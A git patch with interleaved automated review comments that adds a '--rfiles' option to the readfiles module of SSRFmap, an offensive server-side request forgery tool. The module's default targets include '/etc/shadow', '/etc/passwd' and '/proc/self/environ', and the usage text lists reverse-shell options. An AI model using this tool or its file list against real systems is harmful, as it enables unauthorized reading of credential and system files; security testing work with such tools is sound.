From 7055df63151b77e67a36948f0840c69c79db5f61 Mon Sep 17 00:00:00 2001
From: Mateus Pimentel
Date: Tue, 2 Feb 2021 19:34:38 -0300
Subject: [PATCH] Added the possibility to specify files via the --rflags parameter when using the readfiles module.
---
modules/readfiles.py | 14 +++++++++++---
ssrfmap.py | 6 ++++--
2 files changed, 15 insertions(+), 5 deletions(-)
diff --git a/modules/readfiles.py b/modules/readfiles.py
index fa62848..8d1fc32 100644
--- a/modules/readfiles.py
+++ b/modules/readfiles.py
@@ -1,6 +1,10 @@ from core.utils import * import logging import os +from argparse import ArgumentParser + +#parser.add_argument("-f", "--file", dest="filename", +# help="write report to FILE", metavar="FILE") name = "readfiles" description = "Read files from the target"
@@ -8,12 +12,13 @@ author = "Swissky" documentation = [] class exploit(): - files = ["/etc/passwd", "/etc/lsb-release", "/etc/shadow", "/etc/hosts", "\/\/etc/passwd", "/proc/self/environ", "/proc/self/cmdline", "/proc/self/cwd/index.php", "/proc/self/cwd/application.py", "/proc/self/cwd/main.py", "/proc/self/exe"] - + def __init__(self, requester, args): logging.info("Module '{}' launched !".format(name)) - + self.files = args.targetfiles.split(',') if args.targetfiles != None else ["/etc/passwd", "/etc/lsb-release", "/etc/shadow", "/etc/hosts", "\/\/etc/passwd", "/proc/self/environ", "/proc/self/cmdline", "/proc/self/cwd/index.php", "/proc/self/cwd/application.py", "/proc/self/cwd/main.py", "/proc/self/exe"] + r = requester.do_request(args.param, "") + if r != None: default = r.text
@@ -36,3 +41,6 @@ class exploit(): logging.info("\033[32mWriting file\033[0m : {} to {}".format(f, directory + "/" + filename)) with open(directory + "/" + filename, 'w') as f: f.write(diff) + + else: + print("Empty response")
diff --git a/ssrfmap.py b/ssrfmap.py
index 2a58e26..2d1d1eb 100644
--- a/ssrfmap.py
+++ b/ssrfmap.py
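Review bot: In modules/readfiles.py, hunk `@@ -1,6 +1,10 @@`, the added `from argparse import ArgumentParser` and the two commented-out `#parser.add_argument(...)` lines are dead code: nothing visible in this patch uses `ArgumentParser` in the module, and argument parsing stays in ssrfmap.py. I would drop both so the module header carries only what it needs. If a pointer is wanted here, one line such as `# file list comes from --rfiles (args.targetfiles), comma-separated` says more than a commented-out call.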
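Review bot: In modules/readfiles.py, hunk `@@ -8,12 +12,13 @@`, the added `self.files = args.targetfiles.split(',') if args.targetfiles != None else [...]` raises AttributeError when `--rfiles` is passed without a value, because the ssrfmap.py hunk `@@ -32,10 +33,11 @@` declares the option with `nargs='?', const=True` and therefore stores the boolean `True`; the usage example added in `@@ -23,6 +23,7 @@` (`-m readfiles --rfiles`) is exactly that invocation. Requiring a value fixes it at the source: `parser.add_argument('--rfiles', action='store', dest='targetfiles', help="Comma-separated files to read with readfiles module")`, with the example changed to `--rfiles <path1>,<path2>`. On this line, `is not None` is the idiomatic test, and `[p.strip() for p in args.targetfiles.split(',') if p.strip()]` keeps `a, b` or a trailing comma from producing padded or empty entries. The default list would also read better as a named constant than inlined in the conditional; `__init__` continues outside the hunk.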
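Review bot: The added `else: print("Empty response")` in modules/readfiles.py, hunk `@@ -36,3 +41,6 @@`, bypasses the `logging` calls the rest of the module uses, so the message ignores the configured level and format; `logging.warning("Empty response, no files were read")` would be consistent. Indentation is not recoverable from this view, so I assume the `else` pairs with the `if r != None:` check on the baseline request; a short comment on the branch saying so would help. Separately, now that the entries in `self.files` can come from the command line, confirm that `filename` (built outside this hunk) cannot contain `/` or `..` before it is joined in `open(directory + "/" + filename, 'w')`, so output stays inside `directory`.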
@@ -23,6 +23,7 @@ def parse_args(): python ssrfmap.py -r data/request.txt -p url -m redis python ssrfmap.py -r data/request.txt -p url -m portscan --ssl --uagent "SSRFmapAgent" python ssrfmap.py -r data/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242 + python ssrfmap.py -r data/request.txt -p url -m readfiles --rfiles ''' parser = argparse.ArgumentParser(epilog=example_text, formatter_class=argparse.RawDescriptionHelpFormatter) parser.add_argument('-r', action ='store', dest='reqfile', help="SSRF Request file")
@@ -32,10 +33,11 @@ def parse_args(): parser.add_argument('-v', action ='store', dest='verbose', help="Enable verbosity", nargs='?', const=True) parser.add_argument('--lhost', action ='store', dest='lhost', help="LHOST reverse shell") parser.add_argument('--lport', action ='store', dest='lport', help="LPORT reverse shell") + parser.add_argument('--rfiles', action ='store', dest='targetfiles', help="Files to read with readfiles module", nargs='?', const=True) parser.add_argument('--uagent',action ='store', dest='useragent', help="User Agent to use") parser.add_argument('--ssl', action ='store', dest='ssl', help="Use HTTPS without verification", nargs='?', const=True) parser.add_argument('--level', action ='store', dest='level', help="Level of test to perform (1-5, default: 1)", nargs='?', const=1, default=1, type=int) - results = parser.parse_args() + results = parser.parse_args() if results.reqfile == None: parser.print_help()
@@ -55,4 +57,4 @@ if __name__ == "__main__": # SSRFmap args = parse_args() - ssrf = SSRF(args) \ No newline at end of file + ssrf = SSRF(args)
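Review bot: In ssrfmap.py, hunk `@@ -32,10 +33,11 @@`, the help string for `--rfiles` does not say that the value is a comma-separated list, which is the only format the readfiles module handles (it calls `.split(',')` on it); `help="Comma-separated list of files to read with the readfiles module (default: built-in list)"` would document that. The commit subject also names the option `--rflags`, while the code adds `--rfiles`. The `results = parser.parse_args()` line is removed and re-added with identical text, so it differs only in whitespace; that churn is better kept out of a feature commit. `parse_args()` starts and ends outside the hunk.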